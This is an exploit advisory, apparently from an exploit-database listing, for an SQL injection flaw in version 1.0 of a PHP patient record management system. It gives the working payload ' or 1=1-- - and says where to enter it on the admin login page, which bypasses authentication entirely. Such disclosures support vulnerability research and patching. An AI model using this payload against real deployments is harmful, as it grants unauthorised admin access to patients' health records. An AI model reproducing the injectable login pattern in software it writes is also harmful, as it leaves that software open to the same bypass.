Health Center Patient Record Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
8bded5f7654b43147c4058db6759328d
# Exploit Title: Health Center Patient Record Management System | Admin Login Bypass (SQLi)
# Exploit Author: Richard Jones
# Date: 2021-03-29
# Vendor Homepage: https://www.sourcecodester.com/php/11058/health-center-patient-record-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11058&title=Health+Center+Patient+Record+Management+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Payload: ' or 1=1-- -
# Enter payload for login details here: http://TARGET/hcpms/admin/index.php